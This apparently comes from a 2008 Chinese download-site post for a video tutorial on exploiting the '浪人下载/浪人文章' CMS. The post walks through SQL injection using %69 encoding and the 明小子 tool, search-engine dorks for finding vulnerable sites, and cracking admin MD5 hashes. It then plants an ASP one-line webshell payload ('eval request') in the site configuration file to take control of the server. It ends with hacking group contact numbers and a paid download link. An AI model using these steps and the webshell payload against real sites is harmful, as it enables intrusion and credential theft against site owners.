浪人下载文章的0DAY漏洞利用

软件简介：
今天做的动画是浪人下载和浪人文章的0DAY漏洞利用
. V' V) H+ U. i其实也不是什么0DAY啦，就是一个注入漏洞
浪人：www.lre.cn
大家可以快进看
先随便点一个软件下载
官方都更新到2.4了，但是还是官方自己再用，不过也有漏洞哦
# O: p2 a) w6 {5 h把下载地址复制到明小子里面，把I改成%69
看到了吗，没有改之前是不能注入额
+ z) x' a' |2 J/ S0 b9 k- ?恭喜,该URL可以注入!
6 k; l) G) ?% I0 o* Q数据库类型:Access数据库
下面来讲讲关键字的搜索
下载链接若长时间无响应，请稍候再试；无法下载或是其它问题，请给我留言.....就是这一句了
- w7 y  S8 [& C2 i在BAIDU上搜搜看
百度一下，找到相关网页约6,030篇
4 a/ s' o5 L4 h3 C) q再看看GOOGLE
网页 约有12,800项符合
& Y0 y% d; F3 L$ j) @5 j; T看到了吧
. N% ?- x! h  q& _, r2 I% L1 X下面正式进入正题，我就不打字了
大家仔细看
我在本机上测试的
Admin_Info
是管理员表
4 D# i2 w- d4 z/ o3 j: a密码是MD5加密的，在WWW.CMD5.COM上可以解密
  @, M* E6 ~/ B郁闷。。。。不知道为什么本机老跑不出来
反正我知道密码啦，下面开始拿webshell
" b4 r0 O# S2 R! b如果你们猜的话一定可以猜出来的
/ |, z" o2 e+ T# Z本机猜出来了
有些后台是ADMIN.ASP
还有的是LOGIN.ASP
$ l3 q( z+ C0 s! z& F7 z  R& u版本不同啦
3 f( K4 T1 T7 I: K9 J& s后台有两种方法拿WEBSHELL
看我演示
8 M$ n4 z3 h7 Y( q. ^OK，这是第一种
下面讲第二种
1 P8 b0 }2 u0 m在网站配置信息里
插入一句话
不是光查
%eval request(#)%
5 i6 H8 `( G- ~, l8 B/ o这样是不行的
( C8 `3 t' v1 ^, h/ t2 v8 c! c4 S看演示
. B# e( C" G- N( Jsss%%eval request(#)%%ViewMessage=c
下载说明里面写上上面的一句话
我都已经写好了
# w. y4 E" w9 X3 p; F) ehttp://localhost/down/Inc\Config.asp
这个是我一句话的地址
然后连接就可以了
88
邪恶领域［一］群
群号：8494875
' P" F- N% ?; v# Z* ?% O, w邪恶领域［二］群
群号：5501649
补充一下
0 P7 R; ~2 J' F8 _4 z浪人文章也有一样的漏洞
88
下载地址：

2008-8-18 13:41 上传 浪人下载文章的0DAY漏洞利用.rar

下载权限:

版本vip会员

本地下载 检测资源

有些游戏资源需要vip下载开通请点击开通vip